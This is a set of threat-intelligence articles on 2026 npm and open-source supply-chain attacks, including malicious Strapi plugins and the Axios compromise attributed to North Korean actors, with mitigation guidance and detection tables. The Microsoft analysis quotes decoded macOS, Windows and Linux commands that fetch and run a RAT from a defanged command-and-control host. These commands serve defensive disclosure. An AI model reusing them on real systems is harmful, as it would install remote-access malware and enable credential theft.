Cybersecurity researchers have discovered 36 malicious packages in the npm registry that are disguised as Strapi CMS plugins but come with different payloads to facilitate Redis and PostgreSQL exploitation, deploy reverse shells, harvest credentials, and drop a persistent implant.
"Every package contains three files (package.json, index.js, postinstall.js), has no description, repository, or homepage, and uses version 3.6.8 to appear as a mature Strapi v3 community plugin," SafeDep [said](https://safedep.io/malicious-npm-strapi-plugin-events-c2-agent/).
All identified npm packages follow the same naming convention, starting with "strapi-plugin-" and then phrases like "cron," "database," or "server" to fool unsuspecting developers into downloading them. It's worth noting that the official Strapi plugins are scoped under "@strapi/."
The packages, uploaded by four sock puppet accounts "umarbek1233," "kekylf12," "tikeqemif26," and "umar_bektembiev1" over a period of 13 hours, are listed below -
- strapi-plugin-cron
- strapi-plugin-config
- strapi-plugin-server
- strapi-plugin-database
- strapi-plugin-core
- strapi-plugin-hooks
- strapi-plugin-monitor
- strapi-plugin-events
- strapi-plugin-logger
- strapi-plugin-health
- strapi-plugin-sync
- strapi-plugin-seed
- strapi-plugin-locale
- strapi-plugin-form
- strapi-plugin-notify
- strapi-plugin-api
- strapi-plugin-sitemap-gen
- strapi-plugin-nordica-tools
- strapi-plugin-nordica-sync
- strapi-plugin-nordica-cms
- strapi-plugin-nordica-api
- strapi-plugin-nordica-recon
- strapi-plugin-nordica-stage
- strapi-plugin-nordica-vhost
- strapi-plugin-nordica-deep
- strapi-plugin-nordica-lite
- strapi-plugin-nordica
- strapi-plugin-finseven
- strapi-plugin-hextest
- strapi-plugin-cms-tools
- strapi-plugin-content-sync
- strapi-plugin-debug-tools
- strapi-plugin-health-check
- strapi-plugin-guardarian-ext
- strapi-plugin-advanced-uuid
- strapi-plugin-blurhash
An analysis of the packages reveals that the malicious code is embedded within the postinstall script hook, which gets executed on "npm install" without requiring any user interaction. It runs with the same privileges as the installing user, meaning that in CI/CD environments and Docker containers where installs run as root, the payload runs as root too.
The evolution of the payloads distributed as part of the campaign is as follows -
- Weaponize a locally accessible Redis instance for remote code execution by injecting a crontab (aka cron table) entry to download and execute a shell script from a remote server every minute. The shell script writes a PHP web shell and Node.js reverse shell via SSH to Strapi's public uploads directory. It also attempts to scan the disk for secrets (e.g., Elasticsearch and cryptocurrency wallet seed phrases) and exfiltrate a Guardarian API module.
- Combine Redis exploitation with Docker container escape to write shell payloads to the host outside the container. It also launches a direct Python reverse shell on port 4444 and writes a reverse shell trigger into the application’s node_modules directory via Redis.
- Deploy a reverse shell and write a shell downloader via Redis and execute the resulting file.
- Scan the system for environment variables and PostgreSQL database connection strings.
- Deploy an expanded credential harvester and reconnaissance payload that gathers environment dumps, Strapi configurations, Redis database contents (extracted by running the INFO, DBSIZE, and KEYS commands), network topology information, Docker/Kubernetes secrets, cryptographic keys, and cryptocurrency wallet files.
- Conduct PostgreSQL database exploitation by connecting to the target's PostgreSQL database using hard-coded credentials and querying Strapi-specific tables for secrets. It also dumps matching cryptocurrency-related patterns (e.g., wallet, transaction, deposit, withdraw, hot, cold, and balance) and attempts to connect to six Guardarian databases. This indicates that the threat actor is already in possession of the data, obtained either via a prior compromise or through some other means.
- Deploy a persistent implant designed to maintain remote access to a specific hostname ("prod-strapi").
- Facilitate credential theft by scanning hard-coded paths and spawning a persistent reverse shell.
"The eight payloads show a clear narrative: the attacker started aggressively (Redis RCE, Docker escape), found those approaches weren't working, pivoted to reconnaissance and data collection, used hardcoded credentials for direct database access, and finally settled on persistent access with targeted credential theft," SafeDep said.
The nature of the payloads, combined with the focus on digital assets and the use of hard-coded database credentials and hostname, raises the possibility that the campaign was a targeted attack against a cryptocurrency platform. Users who have installed any of the aforementioned packages are advised to assume compromise and rotate all credentials.
The disclosure coincides with the discovery of several other supply chain attacks targeting the open-source ecosystem -
- A GitHub account named "[ezmtebo](https://safedep.io/prt-scan-github-actions-exfiltration-campaign/)" has submitted over 256 pull requests across various open-source repositories containing a credential exfiltration payload. "It steals secrets through CI logs and PR comments, injects temporary workflows to dump secret values, auto-applies labels to bypass pull_request_target gates, and runs a background /proc scanner for 10 minutes after the main script exits," SafeDep said.
- A hijack of "[dev-protocol](https://www.stepsecurity.io/blog/malicious-polymarket-bot-hides-in-hijacked-dev-protocol-github-org-and-steals-wallet-keys)," a verified GitHub organization, to distribute malicious Polymarket trading bots with typosquatted npm dependencies ("ts-bign" and "levex-refa" or "big-nunber" and "lint-builder") that steal wallet private keys, exfiltrate sensitive files, and open an SSH backdoor on the victim's machine. While "levex-refa" functions as a credential stealer, "lint-builder" installs the SSH backdoor. Both "ts-bign" and "big-nunber" are designed to deliver "levex-refa" and "lint-builder," respectively, as a transitive dependency.
- A compromise of the popular Emacs package, "[kubernetes-el/kubernetes-el](https://www.stepsecurity.io/blog/kubernetes-el-compromised-how-a-pwn-request-exploited-a-popular-emacs-package)," that exploited the [Pwn Request vulnerability](https://thehackernews.com/2026/03/unc6426-exploits-nx-npm-supply-chain.html) in its GitHub Actions workflow by using the pull_request_target trigger to steal the repository's GITHUB_TOKEN, exfiltrate CI/CD secrets, deface the repository, and inject destructive code to delete nearly all repository files.
- A compromise of the legitimate "[xygeni/xygeni-action](https://www.stepsecurity.io/blog/xygeni-action-compromised-c2-reverse-shell-backdoor-injected-via-tag-poisoning)" GitHub Actions workflow using stolen maintainer credentials to plant a reverse shell backdoor. Xygeni has since [implemented new security controls](https://xygeni.io/blog/security-incident-report-xygeni-action-github-action-compromise/) to address the incident.
- A compromise of the legitimate npm package, "[mgc](https://safedep.io/malicious-npm-mgc-compromised-rat/)," by means of an account takeover to push four malicious versions (1.2.1 through 1.2.4) containing a dropper script that detects the operating system and fetches a platform-specific payload – a Python trojan for Linux and a PowerShell variant for Windows called WAVESHAPER.V2 – from a GitHub Gist. The attack [shares direct overlap](https://thehackernews.com/2026/04/unc1069-social-engineering-of-axios.html) with the recent supply chain attack targeting Axios, which has been attributed to a North Korean threat cluster tracked as UNC1069.
- A malicious npm package named "[express-session-js](https://safedep.io/malicious-npm-package-express-session-js/)" that typosquats "express-session" and contains a dropper that retrieves a next-stage remote access trojan (RAT) from JSON Keeper to conduct data theft and persistent access by connecting to "216.126.237[.]71" using the Socket.IO library.
- A compromise of the legitimate PyPI package, "[bittensor-wallet](https://www.stepsecurity.io/blog/bittensor-wallet-4-0-2-compromised-on-pypi---backdoor-exfiltrates-private-keys)" (version 4.0.2), to deploy a backdoor that's triggered during a wallet decryption operation to exfiltrate wallet keys using HTTPS, DNS tunneling, and raw TLS as exfiltration channels to either a hard-coded domain or one created using a Domain Generation Algorithm (DGA) that's rotated daily.
- A malicious PyPI package named "[pyronut](https://www.endorlabs.com/learn/malicious-pyronut-package-backdoors-telegram-bots-with-remote-code-execution)" that typosquats "pyrogram," a popular Python Telegram API framework, to embed a stealthy backdoor that's triggered every time a Telegram client starts and seizes control of the Telegram session and the underlying host system. "The backdoor registers hidden Telegram message handlers that allow two hardcoded attacker-controlled accounts to execute arbitrary Python code (via the /e command and the meval library) and arbitrary shell commands (via the /shell command and subprocess) on the victim's machine," Endor Labs said.
- A set of three malicious Microsoft Visual Studio Code (VS Code) extensions published by "[IoliteLabs](https://www.stepsecurity.io/blog/malicious-iolitelabs-vscode-extensions-target-solidity-developers-on-windows-macos-and-linux-with-backdoor)" – "solidity-macos," "solidity-windows," and "solidity-linux" – that had been dormant since 2018 but were updated on March 25, 2026, to launch a multi-stage backdoor targeting Windows and macOS systems upon launching the application and to establish persistence. Collectively, the extensions had 27,500 installs prior to their removal.
- Multiple versions of the "[KhangNghiem/fast-draft](https://www.aikido.dev/blog/fast-draft-open-vsx-bloktrooper)" VS Code extension on Open VSX (0.10.89, 0.10.105, 0.10.106, and 0.10.112) that execute a GitHub-hosted downloader to deploy a second-stage Socket.IO RAT, an information stealer, a file exfiltration module, and a clipboard monitor from a GitHub repository. Interestingly, versions 0.10.88, 0.10.111, and 0.10.129-135 have been found to be clean. "That is not the release pattern you expect from a single compromised build or a maintainer who has fully switched to malicious behavior," Aikido said. "It looks more like two competing release streams sharing the same publisher identity."
In a report published in February 2026, Group-IB revealed that software supply chain attacks have become "the dominant force reshaping the global cyber threat landscape," adding that threat actors are going after trusted vendors, open-source software, SaaS platforms, browser extensions, and managed service providers to gain inherited access to hundreds of downstream organizations.
The supply chain threat can rapidly escalate a single localized intrusion into something with a large-scale, cross-border impact, with attackers industrializing supply chain compromises and turning them into a "self-reinforcing" ecosystem, as they offer reach, speed, and stealth.
"Package repositories such as npm and PyPI have become prime targets, stolen maintainer credentials, and automated malware worms to compromise widely used libraries – turning development pipelines into large-scale distribution channels for malicious code," Group-IB [said](https://www.group-ib.com/media-center/press-releases/htct-2026-supply-chain/).
Axios npm hack used fake Teams error fix to hijack maintainer account
The maintainers of the popular Axios HTTP client have published a detailed post-mortem describing how one of its developers was targeted by a social engineering campaign believed to have been conducted by North Korean threat actors. [...]
UNC1069 Social Engineering of Axios Maintainer Led to npm Supply Chain Attack
The maintainer of the Axios npm package has confirmed that the supply chain compromise was the result of a highly-targeted social engineering campaign orchestrated by North Korean threat actors tracked as [UNC1069](https://thehackernews.com/2026/04/google-attributes-axios-npm-supply.html).
Maintainer Jason Saayman said the attackers tailored their social engineering efforts "specifically to me" by first approaching him under the guise of the founder of a legitimate, well-known company.
"They had cloned the company's founders' likeness as well as the company itself," Saayman [said](https://github.com/axios/axios/issues/10636) in a post-mortem of the incident. "They then invited me to a real Slack workspace. This workspace was branded to the company's CI and named in a plausible manner. The Slack [workspace] was thought out very well; they had channels where they were sharing LinkedIn posts."
Subsequently, the threat actors are said to have scheduled a meeting with him on Microsoft Teams. Upon joining the fake call, he was presented with a fake error message that stated "something on my system was out of date." As soon as the update was triggered, the attack led to the deployment of a remote access trojan.
The access afforded by the trojan enabled the attackers to steal the npm account credentials necessary to publish two trojanized versions of the Axios npm package (1.14.1 and 0.30.4) containing an implant named WAVESHAPER.V2.
"Everything was extremely well coordinated, looked legit, and was done in a professional manner," Saayman added.
The attack chain described by the project maintainer shares [considerable overlaps](https://thehackernews.com/2026/02/north-korea-linked-unc1069-uses-ai.html) with tradecraft associated with UNC1069 and BlueNoroff. Details of the campaign were extensively documented by [Huntress](https://thehackernews.com/2025/06/bluenoroff-deepfake-zoom-scam-hits.html) and [Kaspersky](https://thehackernews.com/2025/10/researchers-expose-ghostcall-and.html) last year, with the latter tracking it under the moniker GhostCall.
(Image source: Kaspersky)
In these attacks, users are displayed an error message seconds after joining the call, stating that their system is not functioning properly and instructing them to download a malicious Zoom or Teams SDK through a [ClickFix](https://thehackernews.com/2025/08/clickfix-malware-campaign-exploits.html)-like pop-up message. Depending on the operating system of the victim, this action leads to the execution of an AppleScript (for macOS) or a PowerShell (for Windows) script.
One of the malicious payloads deployed as part of the attack chain is a Nim-based macOS backdoor (or a Go variant written for Windows) called CosmicDoor that delivers a comprehensive stealer suite dubbed SilentSiphon to capture credentials from web browsers and password managers, and secrets associated with GitHub, GitLab, Bitbucket, npm, Yarn, Python pip, RubyGems, Rust Cargo, and .NET NuGet.
As [detailed](https://thehackernews.com/2026/04/unc1069-social-engineering-of-axios.html) by Google-owned Mandiant in February 2026, some of these attacks have also paved the way for the deployment of a C++ malware called WAVESHAPER, which then serves as a conduit for additional downloaders, backdoors, and information stealers like HYPERCALL, SUGARLOADER, HIDDENCALL, SILENCELIFT, DEEPBREATH, and CHROMEPUSH.
"Historically, [...] these specific guys have gone after crypto founders, VCs, public people," security researcher Taylor Monahan said. "They [social engineer](https://fortune.com/2026/04/02/north-korea-dprk-zoom-phishing-social-engineering-attack-telegram/) them and take over their accounts and target the next round of people. This evolution to targeting [OSS maintainers] is a bit concerning in my opinion."
As preventive steps, Saayman has outlined several changes, including resetting all devices and credentials, setting up immutable releases, adopting OIDC flow for publishing, and updating GitHub Actions to adopt best practices.
The findings demonstrate how open-source project maintainers are increasingly becoming the target of sophisticated attacks, effectively allowing threat actors to target downstream users at scale by publishing poisoned versions of highly popular packages.
With Axios attracting nearly 100 million weekly downloads and being used heavily across the JavaScript ecosystem, the blast radius of such a supply chain attack can be massive as it propagates swiftly through direct and transitive dependencies.
"A package as widely used as Axios being compromised shows how difficult it is to reason about exposure in a modern JavaScript environment," Socket's Ahmad Nassri [said](https://socket.dev/blog/hidden-blast-radius-of-the-axios-compromise#Why-the-Blast-Radius-Is-Larger-Than-It-Looks). "It is a property of how dependency resolution in the ecosystem works today."
Axios Attack Part of Broader, Coordinated Campaign
In a follow-up analysis published on Friday, Socket [said](https://socket.dev/blog/attackers-hunting-high-impact-nodejs-maintainers) several maintainers across the Node.js ecosystem have come forward with similar experiences, indicating that high-impact, open-source project maintainers were unsuccessfully targeted as part of what has been described as a coordinated social engineering campaign.
"The attack chain: build rapport over weeks, schedule a video call, fake an audio error, prompt the target to install a 'fix,'" Socket CEO Feross Aboukhadijeh [said](https://x.com/feross/status/2040182994699473106). "That fix is a RAT. Once it's on your machine, they have your .npmrc tokens, browser sessions, AWS creds, and Keychain. 2FA doesn't matter. OIDC publishing doesn't matter. Game over."
Targets included Socket's own engineers, [Jordan Harband](https://github.com/ljharb), who maintains ECMAScript polyfills and shims, and [John-David Dalton](https://github.com/jdalton), who is the creator of Lodash, a popular JavaScript utility library that offers methods to handle arrays, objects, and other types of data. Also targeted were Matteo Collina, the lead maintainer of Fastify, Pino, and Undici, Scott Motte, the creator of dotenv, and Pelle Wessman, who is a maintainer of mocha, neostandard, npm-run-all2, and type-fest.
While initial contact with Collina was via a Slack message, Wessman was invited to participate in a podcast recording, as part of which he was instructed to join a video call that turned out to be a fake version of the Streamyard live recording platform.
Once the call began, the bogus site displayed a "technically plausible error message" and prompted Wessman to download a native app to resolve it. When Wessman refused to run it, the North Korean threat actors switched tactics and asked him to run a curl command in the Terminal app. Having failed in this effort too, they erased all conversations and went dark.
In another case documented by Jean Burellier, a Node.js core collaborator and contributor to Express, the social engineering effort began with a LinkedIn message from the threat actors, posing as the representative of a company named Openfort. After the initial trust-building exercise, Burellier was invited to join two Slack workspaces. As soon as he joined, he was placed in a private channel with no other visible members and invited to join a fake Microsoft Teams call.
From here, the attack chain mirrors that of what Huntress, Kaspersky, and Google documented, with the fake Teams page displaying a message to update the Teams SDK. When Burellier declined to install the update and suggested rescheduling the call, he was removed from the Slack workspaces, and the conversations were deleted.
"The accounts now span some of the most widely depended-upon packages in the npm registry and Node.js core itself, and together they confirm that Axios was not a one-off target," the software supply chain security company said. "It was part of a coordinated, scalable attack pattern aimed at high-trust, high-impact open source maintainers."
(The story was updated after publication on April 4, 2026, to reflect the latest developments.)
ghostsurf: From NTLM Relay to Browser Session Hijacking
Source: Research & Tradecraft Archives - SpecterOps
TL;DR: ntlmrelayx's SOCKS proxy works great for SMB and MSSQL but fails when you try to browse a web application through it – I dug into why, found several fundamental issues with how it handles HTTP, built ghostsurf to fix them, and along the way, discovered (and circumvented) some undocumented Windows kernel auth behavior. ghostsurf […]
On March 31, 2026, two new npm packages for updated versions of Axios, a popular HTTP client for JavaScript that simplifies making HTTP requests to a REST endpoint with over 70 million weekly downloads, were identified as malicious. These versions (1.14.1 and 0.30.4) were injected with a malicious dependency to download payloads from known actor command and control (C2). Microsoft Threat Intelligence has attributed this infrastructure and the Axios npm compromise to Sapphire Sleet, a North Korean state actor.
Following successful connection to the malicious C2, a second-stage remote access trojan (RAT) payload was automatically deployed based on the operating system of the compromised device, including macOS, Windows, and Linux. This activity follows the pattern of recent high-profile [supply chain attacks](https://www.microsoft.com/en-us/security/blog/2026/03/24/detecting-investigating-defending-against-trivy-supply-chain-compromise/), where other adversaries poison widely adopted open-source frameworks and their distribution channels to achieve broad downstream impact.
Users who have installed Axios version 1.14.1 or 0.30.4 should rotate their secrets and credentials immediately and downgrade to a safe version (1.14.0 or 0.30.3). Users should also follow the [mitigation and protection guidance](#mitigation-and-protection-guidance) provided in this blog, including disabling auto-updates for Axios npm packages, since the malicious payload includes a hook that will continue to attempt to update.
This blog shares Microsoft Threat Intelligence’s findings from our analysis, [Microsoft Defender detections](#microsoft-defender-detections) in place that alerted and protected our customers, additional protections we have implemented in our products to detect and block malicious components, and suggested mitigations for organizations to prevent further compromise.
Analysis of the attack
On March 31, 2026, two malicious versions of Axios npm packages were released. These packages connected to a known malicious domain (C2) owned by Sapphire Sleet to retrieve a second-stage remote access trojan (RAT). Since Axios packages are commonly auto-updated, any projects with Axios versions higher than axios@^1.14.0 or axios@^0.30.0 connected to this Sapphire Sleet C2 upon installation and downloaded second-stage malware. Windows, macOS, and Linux systems are all targeted with platform-specific payloads.
Microsoft Threat Intelligence has determined the account that created the plain-crypto-js package is associated with Sapphire Sleet infrastructure. That account has been disabled.
Silent install-time code execution using dependency insertion
The updated versions of Axios inject plain-crypto-js@4.2.1, a fake runtime dependency that executes automatically through post-install with no user interaction required. The trusted package’s application logic is not modified; instead, the threat actor added a dependency that is never imported by the package’s runtime code but only exists to trigger an install-time script to download the second-stage RAT. That means normal app behavior might remain unchanged while malicious activity occurs during npm installation or npm update on developer endpoints and continuous integration and continuous delivery (CI/CD) systems.
The dependency is seeded into a clean release (plain-crypto-js@4.2.0) to establish publishing history and reduce scrutiny. A follow‑up release adds the malicious install-time logic (plain-crypto-js@4.2.1), introducing an install hook that runs node setup.js and includes a clean manifest stub (package.md) intended for later replacement.
Two Axios releases are then published with a surgical manifest-only change: axios@1.14.1 and axios@0.30.4 add plain-crypto-js@^4.2.1 as a dependency while leaving Axios source code unchanged. The publication metadata differs from the project’s normal CI-backed publishing pattern (for example, missing trusted publisher binding and missing corresponding repo tag/commit trail for the malicious version).
Execution on compromised environments
The first-stage loader (setup.js) uses layered obfuscation to reconstruct sensitive strings (module names, platform identifiers, file paths, and command templates) at runtime. A developer or CI job runs npm install axios (or a dependency install/update that resolves to the affected versions). The package manager resolves and installs the injected dependency (plain-crypto-js@4.2.1).
During installation, the dependency’s lifecycle script automatically launches node setup.js (no additional user step required), which decodes embedded strings at runtime, identifies the platform, and connects to hxxp://sfrclak[.]com:8000/6202033 to fetch the next stage.
Single endpoint C2 with OS-specific responses
The package connects to a Sapphire Sleet-owned domain (hxxp://sfrclak[.]com) and fetches a second-stage payload from the actor-controlled server behind it, listening on port 8000. The associated IP address (142.11.206[.]73) is tied to Hostwinds, a virtual private server (VPS) provider that Sapphire Sleet is known to commonly use when establishing C2.
All platforms connect to the same resource over the same path (hxxp://sfrclak[.]com:8000/6202033), and the OS selection is conveyed through the POST body: packages.npm.org/product0, product1, or product2. This enables the operator to serve platform-specific payloads from one route while keeping the client-side logic minimal. On Windows, the malicious npm package drops a VBScript stager. On macOS, it drops a native binary.
- macOS: packages.npm.org/product0
- Windows: packages.npm.org/product1
- Linux/other: packages.npm.org/product2
Second-stage delivery and execution mechanics by OS
macOS (Darwin)
On macOS, the RAT is identified as a native binary: com.apple.act.mond.
Setup.js writes an AppleScript into a temp location and runs it silently using nohup osascript … &. AppleScript POSTs packages.npm.org/product0 to hxxp://sfrclak[.]com:8000/6202033, downloads a binary to /Library/Caches/com.apple.act.mond, applies chmod 770, then starts it using /bin/zsh in the background.
```
node setup.js
└─ sh -c 'curl -o /Library/Caches/com.apple.act.mond …'
```
The AppleScript is removed afterward; the durable artifact is typically /Library/Caches/com.apple.act.mond.
- SHA-256: 92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a
Observed macOS command (as decoded):
```
sh -c 'curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 -s hxxp://sfrclak[.]com:8000/6202033 && chmod 770 /Library/Caches/com.apple.act.mond && /bin/zsh -c "/Library/Caches/com.apple.act.mond hxxp://sfrclak[.]com:8000/6202033 &" &> /dev/null'
```
Windows
On Windows, the RAT is identified as a PowerShell script: 6202033.ps1.
- SHA-256: ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c
- SHA-256: 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101
```
node.exe setup.js                 ← npm post-install hook
└─ drops: %TEMP%\6202033.vbs      ← VBScript stager
```
On first execution, the PowerShell RAT creates %PROGRAMDATA%\system.bat and adds a registry run key at HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate, so that the RAT is re-fetched after every reboot and the implant persists.
- SHA-256: f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd
The chain locates PowerShell (using where powershell) then copies and renames the PowerShell into %PROGRAMDATA%\wt.exe (masquerading as a benign-looking executable name). It writes a VBScript in %TEMP% and runs it using cscript //nologo to keep user-facing windows hidden.
The VBScript launches hidden cmd.exe to POST packages.npm.org/product1 to hxxp://sfrclak[.]com:8000/6202033, saves the response to a temp .ps1, executes it with hidden window and execution-policy bypass, then deletes the .ps1.
The temporary .vbs is also removed; the durable artifact is often %PROGRAMDATA%\wt.exe.
Observed Windows command (as decoded):
```
"cmd.exe" /c curl -s -X POST -d "packages.npm.org/product1" "hxxp://sfrclak[.]com:8000/6202033" > "C:\Users\\AppData\Local\Temp\6202033.ps1" & "C:\ProgramData\wt.exe" -w hidden -ep bypass -file "C:\Users\\AppData\Local\Temp\6202033.ps1" "hxxp://sfrclak[.]com:8000/6202033" & del "C:\Users\\AppData\Local\Temp\6202033.ps1" /f
```
Linux/others
On Linux, the RAT is identified as a Python payload: ld.py.
- SHA-256: fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf
A Python payload is written to /tmp/ld.py and launched detached using nohup python3 … &, suppressing output (> /dev/null 2>&1).
```
node setup.js
└─ /bin/sh -c "curl -o /tmp/ld.py …"
```
Setup.js executes a shell one-liner to POST packages.npm.org/product2 to hxxp://sfrclak[.]com:8000/6202033.
The response is saved as /tmp/ld.py and executed in the background using nohup python3 /tmp/ld.py hxxp://sfrclak[.]com:8000/6202033 … &.
/tmp/ld.py remains a key on-disk indicator in typical flows.
Observed Linux/Unix command (as decoded):
```
/bin/sh -c "curl -o /tmp/ld.py -d packages.npm.org/product2 -s hxxp://sfrclak[.]com:8000/6202033 && nohup python3 /tmp/ld.py hxxp://sfrclak[.]com:8000/6202033 > /dev/null 2>&1 &"
```
Post-execution defense evasion
After launching the second-stage payload, the installer logic removes its own loader (setup.js) and removes the manifest (package.json) that contained the install trigger.
It then renames package.md to package.json, leaving behind a clean-looking manifest to reduce the chance that post-incident inspection of node_modules reveals the original install hook.
RAT deployment as covert remote management
The Windows RAT is a PowerShell script that functions as a covert remote management component designed to persist on Windows systems and maintain continuous contact with an external command server. When executed, it generates a unique host identifier, collects detailed system and hardware information (including OS version, boot time, installed hardware, and running processes), and establishes persistence by creating a hidden startup entry that re-launches the script at user sign in under the guise of a legitimate update process.
The RAT communicates with the remote server using periodic, encoded HTTP POST requests that blend in with benign traffic patterns, initially sending host inventory and then polling for follow‑on instructions. Supported commands allow the remote threat actor to execute arbitrary PowerShell code, enumerate files and directories across the system, inject additional binary payloads directly into memory, or terminate execution on demand. To reduce forensic visibility, the script favors in‑memory execution, temporary files, and Base64‑encoded payloads, enabling flexible control of the compromised system while minimizing on‑disk artifacts.
Who is Sapphire Sleet?
Sapphire Sleet is a North Korean state actor that has been active since at least March 2020. The threat actor focuses primarily on the finance sector, including cryptocurrency, venture capital, and blockchain organizations. These targets are often global, with a particular interest in the United States, as well as countries in Asia and the Middle East. The primary motivation of this actor is to steal cryptocurrency wallets to generate revenue, and target technology or intellectual property related to cryptocurrency trading and blockchain platforms.
Sapphire Sleet often leverages social networking sites, such as LinkedIn, to initiate contact by directing users to click links, leading to malicious files hosted on attacker-controlled cloud storage services such as OneDrive or Google Drive, using domains masquerading as financial institutions like United States-based banks or cryptocurrency pages, and fraudulent meeting links that impersonate legitimate video conferencing applications, such as Zoom. Sapphire Sleet overlaps with activity tracked by other security vendors as UNC1069, STARDUST CHOLLIMA, Alluring Pisces, BlueNoroff, CageyChameleon, or CryptoCore.
Mitigation and protection guidance
In organizations where updates to npm packages should be reviewed before deployment, disabling auto-upgrade is strongly encouraged. In package.json, remove the caret (^) and tilde (~) range prefixes: a caret accepts any newer minor or patch release below the next major version, and a tilde accepts any newer patch release within the same minor. Use an exact version instead and handle upgrades manually. A committed package-lock.json installed with npm ci already freezes resolved versions; range prefixes matter for fresh installs without a lockfile, for npm install runs that update the lockfile, and for dependency bots that bump versions.
What to do now if you’re affected
For organizations affected by this attack, Microsoft Threat Intelligence recommends the following steps:
- Roll back all deployments of Axios to safe versions (1.14.0 or earlier on the 1.x line, 0.30.3 or earlier on the 0.x line).
- Use overrides to force pinned versions for transitive dependencies.
- Flush the local cache with "npm cache clean --force".
- Disable or restrict automated dependency bots for critical packages.
- Adopt Trusted Publishing with OIDC to eliminate stored credentials.
- Review your CI/CD pipeline logs for any npm install executions that might have updated to axios@1.14.1 or axios@0.30.4, or for the presence of plain-crypto-js in your npm install / npm ci outputs.
- Look for outbound connections in network egress traffic to sfrclak[.]com or 142.11.206[.]73 (the C2 IP listed in the indicators of compromise below) on port 8000.
- Developer machines: search home directories for any node_modules folder containing plain-crypto-js, axios@1.14.1, or axios@0.30.4.
- Rotate all secrets and credentials that were exposed to compromised systems.
- When possible, ignore postinstall scripts. If the scenario allows, use "npm ci --ignore-scripts" to prevent postinstall hooks from running, or disable lifecycle scripts by default with "npm config set ignore-scripts true". This also blocks the legitimate install scripts some packages rely on (native addons built with node-gyp, for example), so those packages must then be rebuilt deliberately, with scripts enabled for that one command, after the dependency tree has been reviewed.
- Remove all Axios files/code from the victim systems and re-install cleanly.
Defending against the Axios supply chain attack
Microsoft Threat Intelligence recommends the following mitigation measures to protect organizations against this threat.
- Fully stop Axios from being upgraded unless you explicitly choose to upgrade: in package.json, remove ^ or ~ (which allow auto-upgrade of any minor or patch update) and use an exact version. NOTE: With this change, versions never upgrade unless you change them manually:
{ "dependencies": { "axios": "1.14.0" } }
- Block Axios upgrades even if a transitive dependency tries: if Axios appears indirectly, force a version using overrides (supported since npm 8.3). This forces all dependencies to use the pinned version, which is especially useful during security incidents. NOTE: With this change, versions never upgrade unless you change them manually:
{ "overrides": { "axios": "1.14.0" } }
- Disable automated dependency bots (such as Dependabot or Renovate), or restrict Axios updates in their config, to prevent PR-based auto-updates, which are often mistaken for npm behavior:
# Dependabot example (dependabot.yml, under the relevant updates entry)
ignore:
  - dependency-name: "axios"
- Check for malicious Axios versions in the organization to ensure that workflows and systems don't use compromised Axios versions (1.14.1 and 0.30.4).
- Assess the potential blast radius from affected endpoints:
  - The Exposure Management graph provides a unified representation of organizational assets and their relationships, including identities, endpoints, cloud resources and secrets. This graph is also exposed to customers through Advanced Hunting in Microsoft Defender, enabling programmatic exploration of these connections.
  - Using advanced hunting, security teams can query this graph to assess the potential blast radius of any given node, such as a server affected by the RAT. By understanding which assets are reachable through existing permissions and trust relationships, organizations can prioritize remediation of the most critical exposure paths.
  - Additional examples and query patterns are available here as well as in the hunting queries section.
Microsoft Defender detections
[Microsoft Defender](https://www.microsoft.com/security/business/microsoft-defender) customers can refer to the list of applicable detections below. Durable detections that were already in place alerted and protected customers from this attack. We have also released additional protections to detect and block specific malicious components.
Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
| Tactic | Observed activity | Microsoft Defender coverage (blocking detections are indicated where applicable and mapped to specific IoCs, components, or TTPs) |
| --- | --- | --- |
| Initial Access, Execution | The postinstall script downloads the payload from the attacker-controlled server. | Microsoft Defender for Cloud: Malicious Axios supply chain activity detected |
| Initial Access, Execution | Initial execution script setup.js, shipped in plain-crypto-js-4.2.1.tgz, is responsible for launching the malicious chain during install or first run. | Microsoft Defender for Endpoint: Trojan:Script/SuspObfusRAT.A (Blocking); TrojanDownloader:JS/Crosdomd.A (Blocking) |
| Initial Access, Execution | Maliciously packaged crypto library plain-crypto-js@4.2.1 used to execute or support attacker-controlled logic in a supply-chain compromise. | Microsoft Defender for Endpoint: Trojan:JS/AxioRAT.DA!MTB (Blocking) |
| Execution (macOS) | macOS persistence artifact /Library/Caches/com.apple.act.mond launched, masquerading as a legitimate Apple component to maintain stealthy execution. | Microsoft Defender for Endpoint: Trojan:MacOS/Multiverze!rfn (Blocking); Backdoor:MacOS/TalonStrike.A!dha (Blocking); Backdoor:MacOS/Crosdomd.A (Blocking); Behavior:MacOS/SuspNukeSpedExec.B (Blocking); Behavior:MacOS/SuspiciousActivityGen.AE (Blocking) |
| Execution (macOS) | Download and execution of payload | Microsoft Defender for Endpoint: Trojan:Script/SuspObfusRAT.A (Blocking); Trojan:JS/AxioRAT.DA!MTB (Blocking); Trojan:MacOS/Multiverze!rfn (Blocking); Behavior:MacOS/SuspNukeSpedExec.B; Behavior:MacOS/SuspiciousActivityGen.AE; Process launched in the background; Suspicious AppleScript activity; Suspicious script launched; Suspicious shell command execution; Suspicious file or content ingress; Executable permission added to file or directory; Suspicious file dropped and launched |
| Execution (Linux) | Download and execution of payload /tmp/ld.py, a Python loader/downloader used to fetch, decrypt, or launch additional malicious components. | Microsoft Defender for Endpoint: Trojan:Python/TalonStrike.C!dha (Blocking); Backdoor:Python/TalonStrike.C!dha (Blocking) |
| Execution (Linux) | Download and execution of payload | Microsoft Defender for Endpoint: Trojan:Python/TalonStrike.C!dha (Blocking); Process launched in the background; Suspicious communication with a remote target |
| Execution (Windows) | Observed artifacts 6202033.ps1 and system.bat provided attackers persistent remote access, command execution, and follow-on payload delivery on Windows systems. | Microsoft Defender for Endpoint: TrojanDownloader:PowerShell/Powdow.VUE!MTB (Blocking); Trojan:Win32/Malgent (Blocking); TrojanDownloader:PowerShell/Crosdomd.B (Blocking); TrojanDownloader:PowerShell/Crosdomd.A (Blocking); TrojanDownloader:BAT/TalonStrike.F!dha (Blocking); Backdoor:PowerShell/TalonStrike.B!dha (Blocking) |
